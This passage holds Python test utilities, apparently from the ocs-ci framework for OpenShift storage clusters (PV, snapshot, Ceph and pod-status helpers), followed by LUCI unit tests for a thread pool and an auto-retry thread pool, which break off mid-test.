# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
Validate pod oomkilled message are found on log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
Assertion if failed to fetch logs
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
Validate given pod is in running state and not restarted or re-spinned
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
Arguments:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if storagecluster is running on external mode False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
Get Pv size from requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
list: list of pv's size
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
Get Pv names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
Wait for PVs to delete. Delete PVs having ReclaimPolicy 'Retain'
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=20, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch used size in the pool
Args:
exp_val(float): Expected size in GB
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
def get_full_test_logs_path(cname):
"""
Getting the full path of the logs file for particular test
this function use the inspect module to find the name of the caller function, so it need
to be call once from the main test function.
the output is in the form of
ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
# the full log path (relative to ocs-ci base path)
full_log_path = (
f"{ocsci_log_path()}/{log_file_name}/{mname}/{inspect.stack()[1][3]}"
)
return full_log_path
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
disruptions_allowed (int): Count of mon allowed disruption
min_available_mon (int): Count of minimum mon available
max_unavailable_mon (int): Count of maximun mon unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
return:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logging.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd(str): cli command
expected_output_lst(set): A set of strings that need to be included in the command output.
cephtool_cmd(bool): command on ceph-tool pod
debug_node(str): name of node
Returns:
bool: True of all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): type of log
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
str: Output from 'oc get logs rook-ceph-operator command
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
last_log_date_time_obj (datetime obj): type of log
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
last_log_date_time_obj (datetime obj): type of log
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
Clear crash warnings and osd removal leftovers. This function can be used for example,
after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
def mon_pods_running_on_same_node():
"""
Verifies two mons are running on same node
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
statefulset_namee (str): Name of statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get it's datetime
Returns:
datetime object: The event line datetime
"""
if re.search(r"\d{4}-\d{2}-\d{2}", event_line):
return datetime.datetime.strptime(event_line[:26], "%Y-%m-%d %H:%M:%S.%f")
else:
return None
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
bool: True if the rook ceph pod to reach the desired status. False, otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
|
threading_utils_test.py
|
#!/usr/bin/env vpython3
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import functools
import signal
import sys
import threading
import time
import traceback
import unittest
# Mutates sys.path.
import test_env
from utils import threading_utils
def timeout(max_running_time):
"""Test method decorator that fails the test if it executes longer
than |max_running_time| seconds.
It exists to terminate tests in case of deadlocks. There's a high chance that
process is broken after such timeout (due to hanging deadlocked threads that
can own some shared resources). But failing early (maybe not in a cleanest
way) due to timeout is generally better than hanging indefinitely.
|max_running_time| should be an order of magnitude (or even two orders) larger
than the expected run time of the test to compensate for slow machine, high
CPU utilization by some other processes, etc.
Can not be nested.
Noop on windows (since win32 doesn't support signal.setitimer).
"""
if sys.platform == 'win32':
return lambda method: method
def decorator(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
signal.signal(signal.SIGALRM, lambda *_args: self.fail('Timeout'))
signal.setitimer(signal.ITIMER_REAL, max_running_time)
try:
return method(self, *args, **kwargs)
finally:
signal.signal(signal.SIGALRM, signal.SIG_DFL)
signal.setitimer(signal.ITIMER_REAL, 0)
return wrapper
return decorator
class ThreadPoolTest(unittest.TestCase):
MIN_THREADS = 0
MAX_THREADS = 32
# Append custom assert messages to default ones (works with python >= 2.7).
longMessage = True
@staticmethod
def sleep_task(duration=0.01):
"""Returns function that sleeps |duration| sec and returns its argument."""
def task(arg):
time.sleep(duration)
return arg
return task
def retrying_sleep_task(self, duration=0.01):
"""Returns function that adds sleep_task to the thread pool."""
def task(arg):
self.thread_pool.add_task(0, self.sleep_task(duration), arg)
return task
@staticmethod
def none_task():
"""Returns function that returns None."""
return lambda _arg: None
def setUp(self):
super(ThreadPoolTest, self).setUp()
self.thread_pool = threading_utils.ThreadPool(
self.MIN_THREADS, self.MAX_THREADS, 0)
@timeout(10)
def tearDown(self):
super(ThreadPoolTest, self).tearDown()
self.thread_pool.close()
def get_results_via_join(self, _expected):
return self.thread_pool.join()
def get_results_via_get_one_result(self, expected):
return [self.thread_pool.get_one_result() for _ in expected]
def get_results_via_iter_results(self, _expected):
return list(self.thread_pool.iter_results())
def run_results_test(self, task, results_getter, args=None, expected=None):
"""Template function for tests checking that pool returns all results.
Will add multiple instances of |task| to the thread pool, then call
|results_getter| to get back all results and compare them to expected ones.
"""
args = range(0, 100) if args is None else args
expected = args if expected is None else expected
msg = 'Using \'%s\' to get results.' % (results_getter.__name__,)
for i in args:
self.thread_pool.add_task(0, task, i)
results = results_getter(expected)
# Check that got all results back (exact same set, no duplicates).
self.assertEqual(set(expected), set(results), msg)
self.assertEqual(len(expected), len(results), msg)
# Queue is empty, result request should fail.
with self.assertRaises(threading_utils.ThreadPoolEmpty):
self.thread_pool.get_one_result()
@timeout(10)
def test_get_one_result_ok(self):
self.thread_pool.add_task(0, lambda: 'OK')
self.assertEqual(self.thread_pool.get_one_result(), 'OK')
@timeout(10)
def test_get_one_result_fail(self):
# No tasks added -> get_one_result raises an exception.
with self.assertRaises(threading_utils.ThreadPoolEmpty):
self.thread_pool.get_one_result()
@timeout(30)
def test_join(self):
self.run_results_test(self.sleep_task(),
self.get_results_via_join)
@timeout(30)
def test_get_one_result(self):
self.run_results_test(self.sleep_task(),
self.get_results_via_get_one_result)
@timeout(30)
def test_iter_results(self):
self.run_results_test(self.sleep_task(),
self.get_results_via_iter_results)
@timeout(30)
def test_retry_and_join(self):
self.run_results_test(self.retrying_sleep_task(),
self.get_results_via_join)
@timeout(30)
def test_retry_and_get_one_result(self):
self.run_results_test(self.retrying_sleep_task(),
self.get_results_via_get_one_result)
@timeout(30)
def test_retry_and_iter_results(self):
self.run_results_test(self.retrying_sleep_task(),
self.get_results_via_iter_results)
@timeout(30)
def test_none_task_and_join(self):
self.run_results_test(self.none_task(),
self.get_results_via_join,
expected=[])
@timeout(30)
def test_none_task_and_get_one_result(self):
self.thread_pool.add_task(0, self.none_task(), 0)
with self.assertRaises(threading_utils.ThreadPoolEmpty):
self.thread_pool.get_one_result()
@timeout(30)
def test_none_task_and_and_iter_results(self):
self.run_results_test(self.none_task(),
self.get_results_via_iter_results,
expected=[])
@timeout(30)
def test_generator_task(self):
MULTIPLIER = 1000
COUNT = 10
# Generator that yields [i * MULTIPLIER, i * MULTIPLIER + COUNT).
def generator_task(i):
for j in range(COUNT):
time.sleep(0.001)
yield i * MULTIPLIER + j
# Arguments for tasks and expected results.
args = range(0, 10)
expected = [i * MULTIPLIER + j for i in args for j in range(COUNT)]
# Test all possible ways to pull results from the thread pool.
getters = (self.get_results_via_join,
self.get_results_via_iter_results,
self.get_results_via_get_one_result,)
for results_getter in getters:
self.run_results_test(generator_task, results_getter, args, expected)
@timeout(30)
def test_concurrent_iter_results(self):
def poller_proc(result):
result.extend(self.thread_pool.iter_results())
args = range(0, 100)
for i in args:
self.thread_pool.add_task(0, self.sleep_task(), i)
# Start a bunch of threads, all calling iter_results in parallel.
pollers = []
for _ in range(0, 4):
result = []
poller = threading.Thread(target=poller_proc, args=(result,))
poller.start()
pollers.append((poller, result))
# Collects results from all polling threads.
all_results = []
for poller, results in pollers:
poller.join()
all_results.extend(results)
# Check that got all results back (exact same set, no duplicates).
self.assertEqual(set(args), set(all_results))
self.assertEqual(len(args), len(all_results))
@timeout(10)
def test_adding_tasks_after_close(self):
pool = threading_utils.ThreadPool(1, 1, 0)
pool.add_task(0, lambda: None)
pool.close()
with self.assertRaises(threading_utils.ThreadPoolClosed):
pool.add_task(0, lambda: None)
@timeout(10)
def test_double_close(self):
pool = threading_utils.ThreadPool(1, 1, 0)
pool.close()
with self.assertRaises(threading_utils.ThreadPoolClosed):
pool.close()
def test_priority(self):
# Verifies that a lower priority is run first.
with threading_utils.ThreadPool(1, 1, 0) as pool:
lock = threading.Lock()
def wait_and_return(x):
with lock:
return x
def return_x(x):
return x
with lock:
pool.add_task(0, wait_and_return, 'a')
pool.add_task(2, return_x, 'b')
pool.add_task(1, return_x, 'c')
actual = pool.join()
self.assertEqual(['a', 'c', 'b'], actual)
# Disabled due to https://crbug.com/778055
@timeout(30)
def disabled_test_abort(self):
# Trigger a ridiculous amount of tasks, and abort the remaining.
completed = False
results = []
try:
with threading_utils.ThreadPool(2, 2, 0) as pool:
# Allow 10 tasks to run initially.
sem = threading.Semaphore(10)
def grab_and_return(x):
sem.acquire()
return x
for i in range(100):
pool.add_task(0, grab_and_return, i)
# Running at 11 would hang.
results = [pool.get_one_result() for _ in range(10)]
# At that point, there's 10 completed tasks and 2 tasks hanging, 88
# pending.
self.assertEqual(88, pool.abort())
# Calling .join() before these 2 .release() would hang.
sem.release()
sem.release()
results.extend(pool.join())
# The results *may* be out of order. Even if the calls are processed
# strictly in FIFO mode, a thread may preempt another one when returning
# the values.
self.assertEqual(range(12), sorted(results))
completed = True
finally:
# Print debug data if it failed.
if not completed:
print(results)
class AutoRetryThreadPoolTest(unittest.TestCase):
def test_bad_class(self):
exceptions = [AutoRetryThreadPoolTest]
with self.assertRaises(AssertionError):
threading_utils.AutoRetryThreadPool(exceptions, 1, 0, 1, 0)
def test_no_exception(self):
with self.assertRaises(AssertionError):
threading_utils.AutoRetryThreadPool([], 1, 0, 1, 0)
def test_bad_retry(self):
exceptions = [IOError]
with self.assertRaises(AssertionError):
threading_utils.AutoRetryThreadPool(exceptions, 256, 0, 1, 0)
def test_bad_priority(self):
exceptions = [IOError]
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
pool.add_task(0, lambda x: x, 0)
pool.add_task(256, lambda x: x, 0)
pool.add_task(512, lambda x: x, 0)
with self.assertRaises(AssertionError):
pool.add_task(1, lambda x: x, 0)
with self.assertRaises(AssertionError):
pool.add_task(255, lambda x: x, 0)
def test_priority(self):
# Verifies that a lower priority is run first.
exceptions = [IOError]
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
lock = threading.Lock()
def wait_and_return(x):
with lock:
return x
def return_x(x):
return x
with lock:
pool.add_task(threading_utils.PRIORITY_HIGH, wait_and_return, 'a')
pool.add_task(threading_utils.PRIORITY_LOW, return_x, 'b')
pool.add_task(threading_utils.PRIORITY_MED, return_x, 'c')
actual = pool.join()
self.assertEqual(['a', 'c', 'b'], actual)
def test_retry_inherited(self):
# Exception class inheritance works.
class CustomException(IOError):
pass
ran = []
def throw(to_throw, x):
ran.append(x)
if to_throw:
raise to_throw.pop(0)
return x
with threading_utils.AutoRetryThreadPool([IOError], 1, 1, 1, 0) as pool:
pool.add_task(
threading_utils.PRIORITY_MED, throw, [CustomException('a')], 'yay')
actual = pool.join()
self.assertEqual(['yay'], actual)
self.assertEqual(['yay', 'yay'], ran)
def test_retry_2_times(self):
exceptions = [IOError, OSError]
to_throw = [OSError('a'), IOError('b')]
def throw(x):
if to_throw:
raise to_throw.pop(0)
return x
with threading_utils.AutoRetryThreadPool(exceptions, 2, 1, 1, 0) as pool:
pool.add_task(threading_utils.PRIORITY_MED, throw, 'yay')
actual = pool.join()
self.assertEqual(['yay'], actual)
def test_retry_too_many_times(self):
exceptions = [IOError, OSError]
to_throw = [OSError('a'), IOError('b')]
def throw(x):
if to_throw:
raise to_throw.pop(0)
return x
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
pool.add_task(threading_utils.PRIORITY_MED, throw, 'yay')
with self.assertRaises(IOError):
pool.join()
def test_retry_mutation_1(self):
# This is to warn that mutable arguments WILL be mutated.
def throw(to_throw, x):
if to_throw:
raise to_throw.pop(0)
return x
exceptions = [IOError, OSError]
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
pool.add_task(
threading_utils.PRIORITY_MED,
throw,
[OSError('a'), IOError('b')],
'yay')
with self.assertRaises(IOError):
pool.join()
def test_retry_mutation_2(self):
# This is to warn that mutable arguments WILL be mutated.
def throw(to_throw, x):
if to_throw:
raise to_throw.pop(0)
return x
exceptions = [IOError, OSError]
with threading_utils.AutoRetryThreadPool(exceptions, 2, 1, 1, 0) as pool:
pool.add_task(
threading_utils.PRIORITY_MED,
throw,
[OSError('a'), IOError('b')],
'yay')
actual = pool.join()
self.assertEqual(['yay'], actual)
def test_retry_interleaved(self):
# Verifies that retries are interleaved. This is important, we don't want a
# retried task to take all the pool during retries.
exceptions = [IOError, OSError]
lock = threading.Lock()
ran = []
with threading_utils.AutoRetryThreadPool(exceptions, 2, 1, 1, 0) as pool:
def lock_and_throw(to_throw, x):
with lock:
ran.append(x)
if to_throw:
raise to_throw.pop(0)
return x
with lock:
pool.add_task(
threading_utils.PRIORITY_MED,
lock_and_throw,
[OSError('a'), IOError('b')],
'A')
pool.add_task(
threading_utils.PRIORITY_MED,
lock_and_throw,
[OSError('a'), IOError('b')],
'B')
actual = pool.join()
self.assertEqual(['A', 'B'], actual)
# Retries are properly interleaved:
self.assertEqual(['A', 'B', 'A', 'B', 'A', 'B'], ran)
def test_add_task_with_channel_success(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
pool.add_task_with_channel(channel, 0, lambda: 0)
self.assertEqual(0, next(channel))
def test_add_task_with_channel_fatal_error(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
def throw(exc):
raise exc
pool.add_task_with_channel(channel, 0, throw, ValueError())
with self.assertRaises(ValueError):
next(channel)
def test_add_task_with_channel_retryable_error(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
def throw(exc):
raise exc
pool.add_task_with_channel(channel, 0, throw, OSError())
with self.assertRaises(OSError):
next(channel)
def test_add_task_with_channel_captures_stack_trace(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
def throw(exc):
def function_with_some_unusual_name():
raise exc
function_with_some_unusual_name()
